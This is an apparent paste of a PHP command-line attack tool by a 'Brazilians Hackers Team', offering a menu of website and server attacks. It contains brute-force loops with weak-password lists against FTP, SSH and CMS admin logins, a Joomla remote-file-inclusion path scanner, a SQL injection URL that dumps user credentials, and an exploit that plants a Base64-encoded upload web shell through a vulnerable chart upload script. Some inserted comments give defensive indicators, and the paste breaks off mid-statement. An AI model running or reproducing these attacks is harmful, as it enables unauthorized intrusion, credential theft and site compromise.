imoujokerdz

Botnet Hack Websites

Jun 1st, 2017
  1. <?
  2. $nan12="3";
  3. $saza="2$nan12";
  4.  
  5.  
  // Silences every PHP warning and notice for the rest of the run.
  6. error_reporting(0);
  // The operator passphrase is never stored as one literal: it is concatenated from these
  // one-character fragments and $saza (assigned earlier in the file), so a plain string
  // search of the script does not reveal it.
  7. $pre1="1";
  8. $pr3="5";
  9. $namzak="4";
  10. $liliokjk ="$pre1$saza$namzak$pr3";
  // Lifts the execution time limit so the long scanning and guessing loops are not aborted.
  11. set_time_limit(0);
  12.  
  // Writes a second-stage file next to the script. The Base64 blob decodes to a short PHP page
  // (title "*** Brazilians Hackers Team ***") that renders an upload form and, when the POST
  // field _upl equals "Upload", copy()s the uploaded temp file to the client-supplied file name
  // in its own directory, with no authentication and no file-type check.
  // Hunting indicators taken from the decoded page: the <title> text, the _upl form field and
  // the response string "Upload Complate !!!".
  13. $uploadfile="upload.php";
  14. $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT4qKiogQnJhemlsaWFucyBIYWNrZXJzIFRlYW0gKioqPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=");
  // Mode "a+" appends, so each run adds another copy of the payload to upload.php in the
  // current working directory; the @ prefixes hide any I/O error.
  15. $fbr=@fopen("upload.php","a+");
  16. @fwrite($fbr,$uploader);
  17. @fclose($fbr);
  18. ////first
  // $lpa only holds the comparison rendered as text; nothing in the visible part of the file reads it.
  19. $lpa="$liliokjk == $clientpass ";
  // Banner and passphrase prompt (the Portuguese text asks for the password to start).
  // Input is read from STDIN, so the script is written for the PHP command line rather than
  // for execution through a web server.
  20. echo"
  21. +#############################+
  22. # #
  23. # *** Brazilians Hackers Team #
  24. # #
  25. +#############################+
  26. [*]Entre Com A Senha Para Iniciar[*]: ";$clientpass=trim(fgets(STDIN,1024));
  27.  
  28.  
  29.  
  30.  
  31. if($liliokjk == $clientpass){
  32. echo"
  33. ##
  34. / \
  35. / \
  36. / \
  37. / \
  38. / \
  39. /____________\
  40. | |
  41. |, .-. .-. ,|
  42. | )(_o/ \o_)( |
  43. |/ /\ \|
  44. (_ ^^ _)
  45. | |
  46. ==|==========|==>
  47. `----------`
  48. ||==========================================||
  49. || *** Brazilians Hackers Team *** ||
  50. || ||
  51. || *** Brazilians Hackers Team *** ||
  52. ||------------------------------------------||
  53. || ||
  54. || *** Brazilians Hackers Team *** ||
  55. || ||
  56. || ||
  57. ||==========================================||
  58.  
  59.  
  60. [1] JOOMLA SCANNER:
  61. [2] WORDPRESS SCANNER:
  62. [3] GERAL SCAN:
  63. [4] ADMIN FINDER:
  64. [5] TIPOS DE SCRIPT:
  65. [6] BRUTE FORCE:
  66. [7] SAIR DO PROGRAMA
  67. \n\n
  68. ";
  69. echo " Escolha Uma Opcao E Aperte Enter:\n
  70. ===>";
  71. $id =trim(fgets(STDIN,1024));
  72. if(!$id){
  73. $sec=true;
  74. while($sec){
  75. echo"Entre Com Alguma Opcao\n\n";
  76.  
  77. echo "ID Selecionada ===>";
  78. $id =trim(fgets(STDIN,1024));
  79. if($id){
  80. $sec=false;
  81. }
  82. }
  83. }
  84.  
  85. if($id == 7){
  86. echo"
  87. Skype: BrazilObscure
  88. Facebook: ChmoD.Haxor.5
  89. Email: BrazilObscure@live.com
  90.  
  91. ";
  92.  
  93. }
  94. if($id == 6){
  95.  
  96. echo"
  97. | |__ _ __ _ _| |_ ___
  98. | '_ \| '__| | | | __/ _ \
  99. | |_) | | | |_| | || __/
  100. |_.__/|_| \__,_|\__\___|
  101.  
  102. ================================
  103. || Brute Force Arabe Portal ||
  104. || ||
  105. || by ./ChmoD ||
  106. ================================
  107. [1] BRUTE FORCE FTP
  108. [2] BRUTE FORCE SSH
  109. [3] BRUTE FORCE ARABE PORTAL
  110. [4] BRUTE FORCE 4IMAGES
  111. [5] BRUTE FORCE TRAIDENT
  112.  
  113. ";
  114. echo"\n Entre Com Uma ID ===>";
  115. $brutid=trim(fgets(STDIN,1024));
  116. ##############traidnt-br
  117. if($brutid == 5) {
  118. echo"Seu Site ============>";
  119. $trasite=trim(fgets(STDIN,1024));
  120. echo"Usuario ============>";
  121. $trauser = trim(fgets(STDIN,1024));
  122.  
  123. # Passwords
  124. $trauspass1 = array("1234563","123654","123123","112233","123321","102030","123451","123456789","6543213",'654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
  125.  
  // Makes one login attempt against "<site>/admin/login.php".
  //   $site         base URL of the site
  //   $trauser      account name sent as "username"
  //   $trauspass12  candidate sent as "password"
  // Returns whatever curl_exec() returns for the request.
  // Seen from the server, this is a run of POSTs to /admin/login.php for a single account, each
  // carrying a different weak password. Per-account and per-source attempt limits, lockout
  // and a second factor on the admin login are the controls that stop it.
  126. function brute($site,$trauser,$trauspass12)
  127. {
  128. $curl = curl_init();
  // Return the body as a string instead of printing it, and follow redirects.
  129. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  130. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  131. curl_setopt($curl,CURLOPT_URL, $site."/admin/login.php");
  // Setting CURLOPT_POSTFIELDS turns the request into a POST.
  132. curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$trauser}&password={$trauspass12}");
  // Session cookies are written to, and replayed from, a cookie.txt path built from getcwd().
  133. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  134. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  135. $brute = curl_exec($curl);
  136. return $brute;
  137. }
  // Walks the fixed password list and stops at the first response that contains a link
  // labelled "Top", which the script treats as proof of an authenticated page.
  138. foreach($trauspass1 as $trauspass12)
  139. {
  140. $b0x = brute($site,$trauser,$trauspass12);
  141. if(preg_match('#<a href="(.*?)">Top</a>#', $b0x))
  142. {
  143. echo "[+] Cracked \n Username : {$trauser}\n Password : {$trauspass12}\n\n";
  144. break;
  145. }
  146. }
  147.  
  148. }
  149.  
  150.  
  151.  
  152. ////////////////////////4images
  153. if($brutid == 4){
  154. echo"
  155. **********************************
  156. || BRUTE FORCE 4IMAGES ||
  157. ***********************************
  158. ";
  159. echo"Seu Site ALvo ======>";
  160. $images4site =trim(fgets(STDIN,1024));
  161. echo"Usuario =======>";
  162. $images4username = trim(fgets(STDIN,1024));
  163. $images4pass = array("1234563","123654","123123","112233","123321","102030","123451","123456789","6543213",'654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
  164.  
  165. # Function Token
  // Fetches $images4site and returns the value of its hidden "__csrf" form field.
  // The caller requests the token once and reuses it, with the same cookie jar, for every
  // guess. An anti-CSRF token alone therefore does not slow password guessing; attempt
  // limiting on the login handler has to do that.
  166. function token($images4site)
  167. {
  168. $curl = curl_init();
  169. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  170. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  171. curl_setopt($curl,CURLOPT_URL, $images4site);
  172. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  173. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  174. $start = curl_exec($curl);
  // First capture group = the token value; $token[1] is returned without checking for a match.
  175. preg_match('/<input type="hidden" name="__csrf" value="(.*?)" /', $start, $token);
  176. return $token[1];
  177. }
  178. $hash = token($images4site);
  179.  
  180. # Function Brute
  // Makes one login attempt: POSTs the token, action=login and the username / candidate password
  // to $images4site and returns the curl_exec() result.
  //   $images4site      URL the form is posted to
  //   $images4username  account name (field "loginusername")
  //   $images4password  candidate password (field "loginpassword")
  //   $hash             value previously read from the hidden "__csrf" field
  // Server-side signature: many action=login POSTs for one account that reuse the same session
  // cookie and token with changing passwords.
  181. function brute($images4site,$images4username,$images4password,$hash)
  182. {
  183. $curl = curl_init();
  184. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  185. curl_setopt($curl, CURLOPT_POST, 1);
  186. curl_setopt($curl, CURLOPT_URL, $images4site);
  187. curl_setopt($curl, CURLOPT_POSTFIELDS, "__csrf={$hash}&action=login&redirect=#&loginusername=$images4username&loginpassword=$images4password");
  188. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  189. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  190. $brute = curl_exec($curl);
  191. return $brute;
  192. }
  // Tries each listed password in order and stops at the first response containing
  // <p><a href="#">…</a></p>, the markup this script uses as its "logged in" signal.
  193. foreach($images4pass as $images4password)
  194. {
  195. $b0x = brute($images4site,$images4username,$images4password,$hash);
  196. if(preg_match('/<p><a href="#">(.*?)<\/a><\/p>/', $b0x))
  197. {
  198. echo "[+]Usuario Encontrado: {$images4username} \n [+]Password: {$images4password}";
  199. break;
  200. }
  201. }
  202.  
  203.  
  204.  
  205.  
  206.  
  207. }
  208.  
  209.  
  210.  
  211.  
  212.  
  213.  
  214. if($brutid == 3){
  215. echo"
  216. **********************
  217. BRUTE FORCE ARABE PORTAL*
  218. **********************
  219. ";
  220. echo"Site Alvo =========>";
  221. $sitear = trim(fgets(STDIN,1024));
  222. $arsite = "$sitear/admin/";
  223. echo"Nome Do Usuario\n =========>";
  224. $usernamear =trim(fgets(STDIN,1024));
  225. # Passwords
  226. $nonopasswordsasqs = array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
  227.  
  // Makes one login attempt against $arsite (the caller passes "<site>/admin/") with the form
  // fields user_name and user_pass; prints the pair when the response contains a specific
  // <font> heading, and always returns the raw response.
  //   $arsite            login URL
  //   $usernamear        account name
  //   $nonopasswordsasq  candidate password
  // eregi() (case-insensitive POSIX match) exists only in PHP 5.x and earlier, which dates
  // the runtime this branch was written for.
  // Defender view: a fixed sequence of very common passwords posted to /admin/ for one user;
  // login throttling and lockout apply here as for any admin form.
  228. function brute($arsite,$usernamear,$nonopasswordsasq)
  229. {
  230. $curl = curl_init();
  231. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  232. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  233. curl_setopt($curl,CURLOPT_URL, $arsite);
  234. curl_setopt($curl,CURLOPT_POSTFIELDS,"user_name={$usernamear}&user_pass={$nonopasswordsasq}");
  // Cookie jar is a relative "cookie.txt", i.e. created in the process's working directory.
  235. @curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.txt");
  236. @curl_setopt($curl,CURLOPT_COOKIEFILE,"cookie.txt");
  237. $brute = curl_exec($curl);
  238. if(eregi('<p align="center"><b><font size="4" color="#FFFFFF">', $brute))
  239. {
  240. echo "[+] Encontrado
  241. Username:{$usernamear};\n
  242. Password : {$nonopasswordsasq}";
  243. }
  244. return $brute;
  245. }
  246. foreach($nonopasswordsasqs as $nonopasswordsasq)
  247. {
  248. brute($arsite,$usernamear,$nonopasswordsasq);
  249. }
  250.  
  251.  
  252.  
  253. }
  254. //////////////////////////////////ssh brut
  255. if($brutid == 2){
  256. echo"
  257. *********************************
  258. ================================
  259. || ||
  260. || BRUTE FORCE SSH ||
  261. || ||
  262. =================================
  263. Entre Com O Ip Do Servidor
  264. ======>"; $serverssh=trim(fgets(STDIN,1024));
  265. echo"Nome Do Usuario\n ====>"; $usernamessh=trim(fgets(STDIN,1024));
  266. $passwordss=array('ssh','passwodssh','123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
  267. "pass123",
  268. "password123",
  269. "demo",
  270. "demo123",
  271. "demopass",
  272. "123456789","administrator","123321","123456","1234567","12345678","123456789"
  273. ,"123456123456"
  274. ,"admin2010"
  275. ,"admin2011"
  276. ,"P@ssW0rd"
  277. ,"!@#$%^"
  278. ,"!@#$%^&*("
  279. ,"(*&^%$#@!"
  280. ,"111111"
  281. ,"222222"
  282. ,"333333"
  283. ,"444444"
  284. ,"555555"
  285. ,"666666"
  286. ,"777777"
  287. ,"888888"
  288. ,"999999"
  289. ,"admin2012"
  290. ,"admin2013"
  291. ,"admin2014"
  292. ,"password2013"
  293. ,"password2014");
  // For each candidate, opens a fresh connection to port 22 and tries password authentication
  // (ssh2_connect / ssh2_auth_password come from the PECL ssh2 extension). There is no
  // break, so the loop keeps connecting after a success.
  // On the target this appears in the sshd authentication log as a run of failed password
  // logins for one user from one address. Key-only authentication, a low MaxAuthTries and
  // source-based banning remove this attack surface.
  294. foreach($passwordss as $passwordssh){
  295. $conectssh=ssh2_connect($serverssh,22);
  296. if($conectssh){
  297. $sshlogin =ssh2_auth_password($conectssh,$usernamessh,$passwordssh);
  298. if($sshlogin){
  299. echo"
  300. crAcked \n\n
  301. \n\n\n
  302. \n******************************************************\n
  303. \n*user:$usernamessh=====>passsword:$passwordssh\n\n\n *\n
  304. \n******************************************************\n
  305. ";
  306. }else{
  // Failed guess: the bare string expression below is a no-op, so nothing is printed.
  307. "";
  308. }
  309. }else{
  310. echo"Cant#connect";
  311. }
  312. }
  313. ////////////////////////////////////////////////////////////
  314.  
  315.  
  316.  
  317.  
  318. }
  319. if($brutid == 1){
  320. echo"
  321. **********************************
  322. * BRUTE FORCE FTP *
  323. **********************************
  324.  
  325. IP Do Servidor ==>";
  326. $ip= trim(fgets(STDIN,1024));
  327. echo"\n";
  328. echo"Usuario==>";
  329. $usernameftp =trim(fgets(STDIN,1024));
  330.  
  331. $passwordftp=array("gat0tKaca",'123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
  332. "pass123",
  333. "password123",
  334. "demo",
  335. "demo123",
  336. "demopass",
  337. "123456789","administrator","123321","123456","1234567","12345678","123456789"
  338. ,"123456123456"
  339. ,"admin2010"
  340. ,"admin2011"
  341. ,"P@ssW0rd"
  342. ,"!@#$%^"
  343. ,"!@#$%^&*("
  344. ,"(*&^%$#@!"
  345. ,"111111"
  346. ,"222222"
  347. ,"333333"
  348. ,"444444"
  349. ,"555555"
  350. ,"666666"
  351. ,"777777"
  352. ,"888888"
  353. ,"999999"
  354. ,"admin2012"
  355. ,"admin2013"
  356. ,"admin2014"
  357. ,"password2013"
  358. ,"password2014");
  359. foreach($passwordftp as $passftp){
  360. $timeoutftp="40";
  361. $ftpport="21";
  362. $conent=ftp_connect($ip,$ftpport,$timeoutftp);
  363. if($conent){
  364. $lohin=ftp_login($conent,$usernameftp,$passftp);
  365. if($lohin){
  366. echo "Encontrado \n\n
  367. \n\n\n
  368. \n******************************************************\n
  369. \n*user:$usernameftp===>password:$passftp\n\n
  370. \n****************************************************\n";
  371. }else{
  372. echo "";
  373. }
  374.  
  375.  
  376. }else{
  377. echo"CanT connect ";
  378.  
  379. }
  380. }
  381.  
  382.  
  383. }
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394. }
  395. if($id == 1){
  396. echo"
  397. ||=============================================||
  398. || ,--^----------,--------,-----,-------^--, ||
  399. || | ||||||||| `--------' | O ||
  400. || `+---------------------------^----------| ||
  401. || `\_,-------, _________________________| ||
  402. || / XXXXXX /`| / ||
  403. || / XXXXXX / `\ / ||
  404. || / XXXXXX /\______( ||
  405. || / XXXXXX / ||
  406. || / XXXXXX / ||
  407. ||(________( ||
  408. || `------' ||
  409. ||=============================================||
  410. JOOMLA Selecione Alguma ID:
  411. [1]SCANNER UPLOAD SHELL:
  412. [2]SCANNER SQL INJECTION :
  413. [3]SCANNER JCE :
  414. [4]BRUTE FORCE :
  415. [5]SCANNER LFI/RFI:
  416. [6]COMPOSENT FINAL:\n
  417. ";
  418. echo"ID Selecionada ==>";
  419. $joomlaid=trim(fgets(STDIN,1024));
  420.  
  421. }
  422. if($joomlaid == 6){
  423.  
  424. echo"
  425. +#############################+
  426. # #
  427. # COMPOSENT JOOMLA #
  428. # #
  429. +#############################+
  430.  
  431. Site Alvo
  432. =====>";$urlcom=trim(fgets(STDIN,1024));
  433.  
  434. $source = @file_get_contents($urlcom);
  435. preg_match_all('{option,(.*?)/}i',$source,$f);
  436. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  437. preg_match_all('{/component/(.*?)/?view=reset}i',$source,$f3);
  438. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  439. $arz=array_merge($f2[1],$f[1],$f3[1]);
  440. $coms=array();
  441. foreach(array_unique($arz) as $x){
  442. $coms[]=$x;}
  443. foreach($coms as $comm){
  444. echo "
  445. ************************\n
  446. COMPOSENT : $comm\n
  447. ************************\n
  448. ";
  449.  
  450.  
  451. }
  452.  
  453.  
  454.  
  455.  
  456. }
  457. if($joomlaid == 5){
  458. echo"
  459. *********************************
  460. *** Scanner Joomla RFI/LFI ***
  461. *********************************\n\n
  462. Site Alvo http://\n
  463. Seu Site ======> "; $rfijm =trim(fgets(STDIN,1024));
  464. $rfijoomlap=array("/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=#rfi",
  465. "/components/com_simpleboard/file_upload.php?sbp=#rfi",
  466. "/components/com_hashcash/server.php?mosConfig_absolute_path=#rfi",
  467. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=#rfi",
  468. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=#rfi",
  469. "/components/com_performs/performs.php?mosConfig_absolute_path=#rfi",
  470. "/components/com_forum/download.php?phpbb_root_path=#rfi",
  471. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=#rfi",
  472. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=#rfi",
  473. "/components/minibb/index.php?absolute_path=#rfi",
  474. "/components/com_smf/smf.php?mosConfig_absolute_path=#rfi",
  475. "/modules/mod_calendar.php?absolute_path=#rfi",
  476. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=#rfi",
  477. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=#rfi",
  478. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=#rfi",
  479. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=#rfi",
  480. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=#rfi",
  481. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=#rfi",
  482. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=#rfi",
  483. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=#rfi",
  484. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=#rfi",
  485. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=#rfi",
  486. "/components/com_securityimages/lang.php?mosConfig_absolute_path=#rfi",
  487. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=#rfi",
  488. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=#rfi",
  489. "/akocomments.php?mosConfig_absolute_path=#rfi",
  490. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=#rfi",
  491. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=#rfi",
  492. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=#rfi",
  493. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=#rfi",
  494. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=#rfi",
  495. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=#rfi",
  496. "/components/com_fm/fm.install.php?lm_absolute_path=#rfi",
  497. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=#rfi",
  498. "/components/com_lmo/lmo.php?mosConfig_absolute_path=#rfi",
  499. "/components/com_lmo/lmo.php?mosConfig_absolute_path=#rfi",
  500. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=#rfi",
  501. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=#rfi",
  502. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=#rfi",
  503. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=#rfi",
  504. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=#rfi",
  505. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=#rfi",
  506. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=#rfi",
  507. "/components/com_mambowiki/MamboLogin.php?IP=#rfi",
  508. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=#rfi",
  509. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=#rfi",
  510. "/components/com_cpg/cpg.php?mosConfig_absolute_path=#rfi",
  511. "/components/com_moodle/moodle.php?mosConfig_absolute_path=#rfi",
  512. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=#rfi",
  513. "/components/com_mospray/scripts/admin.php?basedir=#rfi",
  514. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=#rfi",
  515. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=#rfi",
  516. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=#rfi",
  517. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=#rfi",
  518. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=#rfi",
  519. "/components/com_madeira/img.php?url=#rfi",
  520. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=#rfi",
  521. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=#rfi",
  522. "/com_bsq_sitestats/external/rssfeed.php?baseDir=#rfi");
  523. foreach($rfijoomlap as $rfisec){
  524. $yesrfi="$rfijm/$rfisec";
  525. $anis=get_headers($yesrfi);
  526. $lirif=preg_match("/404/",$anis[0]);
  527. if(!$lirif){
  528. echo"
  529. ===============================\n
  530. | Encontrado !!!!!\n |
  531. ===============================\n
  532. $yesrfi\n
  533. ";
  534. }
  535.  
  536. }
  537.  
  538. }
  539.  
  540.  
  541. if($joomlaid == 1){
  542. echo " RCE & RCI WEB \n http:// ==>";
  543. $rce =trim(fgets(STDIN,1024));
  544.  
  545.  
  546.  
  547.  
  548. $site = $rce;
  549. $filename = "upload.php";
  550. $path = array('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
  551. $name = array("/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/","/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/","/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/","/administrator/components/com_jinc/classes/graphics/tmp-upload-images/","/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/","/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/");
  552. $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT4qKiogQnJhemlsaWFucyBIYWNrZXJzIFRlYW0gKioqPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=");
  553. $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
  554. $context = stream_context_create($options);
  // Per $sites value, two passes over the Open Flash Chart copies bundled with the listed
  // Joomla components:
  //   1. request each ofc_upload_image.php location with ?name=upload.php, using $context
  //      (method POST, body = the decoded uploader page);
  //   2. fetch upload.php from each matching tmp-upload-images/ directory and look for a
  //      marker string in the response.
  // Hardening: delete the php-ofc-library/ofc_upload_image.php scripts shipped inside these
  // components and deny PHP execution under tmp-upload-images/. In access logs, look for
  // POSTs to ofc_upload_image.php carrying a name=<something>.php query, followed by a GET
  // for that file.
  555. foreach($rce as $sites)
  556. {
  557. foreach($path as $upload)
  558. {
  // The handle is opened only for its side effect on the remote side; it is never read or closed.
  559. $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
  560. }
  561. foreach($name as $names)
  562. {
  563. $url = "{$sites}{$names}{$filename}";
  564. $check = @file_get_contents($url);
  565. if(eregi("brazilobscure@live.com", $check))
  566. {
  567. echo " {$sites}/{$names}/{$filename} \n />";
  568. flush();
  569. }else{
  570. echo "\n Nao Exploitado\n";
  571. }
  572. }
  573. }
  574.  
  // Same upload-script abuse, aimed at the com_maian15 copy and sent through cURL as
  // application/octet-stream; the POST body is taken from $uploadfile.
  // Log indicators visible in these lines: a POST to
  // .../com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=upload.php followed by a GET
  // for .../com_maian15/charts/tmp-upload-images/upload.php?cmd=id.
  575. $headers = array("Content-Type: application/octet-stream");
  576. $uploadfile="upload.php";
  577. $sec4ever =curl_init("$rce/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=upload.php");
  578. curl_setopt($sec4ever, CURLOPT_POST, true);
  579. curl_setopt($sec4ever, CURLOPT_POSTFIELDS, @$uploadfile);
  580. curl_setopt($sec4ever, CURLOPT_RETURNTRANSFER, 1);
  581. curl_setopt($sec4ever, CURLOPT_HTTPHEADER, $headers);
  582. $postResult = curl_exec($sec4ever);
  583. curl_close($sec4ever);
  // Verification step: any non-empty response from the follow-up URL is reported as success.
  584. $uaya="$rce/administrator/components/com_maian15/charts/tmp-upload-images/upload.php?cmd=id";
  585. $na=file_get_contents($uaya);
  586. if($na){
  587. echo"Exploitado\n $uaya";
  588. }
  589. }
  590.  
  591.  
  592. if($joomlaid == 2)
  593. {
  594. echo "Site Alvo http://\n===>";
  595. $jsql=trim(fgets(STDIN,1024));
  596.  
  597. $com_rsfiles="$jsql//index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(0x47726f75705833,username,0x7c3a7c,password,0x47726f75705833)+from+jos_users--";
  598. $get_com=@file_get_contents($com_rsfiles);
  599. if($get_com) {
  600.  
  601. preg_match("#Brazilians Hackers Team#",$get_com,$com_ress);
  602. $all = explode('|:|',$com_ress[1]);
  603. $username = $all[0];
  604. $password = $all[1];
  605. echo "
  606. DOne
  607. username:$username\n
  608. password:$password \n
  609.  
  610. ";
  611. }
  612.  
  613. $Alameda ="$jsql/index.php?option=com_alameda&amp;controller=comments&amp;task=edit&amp;storeid=1";
  614. $na =@file_get_contents($alameda);
  615. if($na)
  616. {
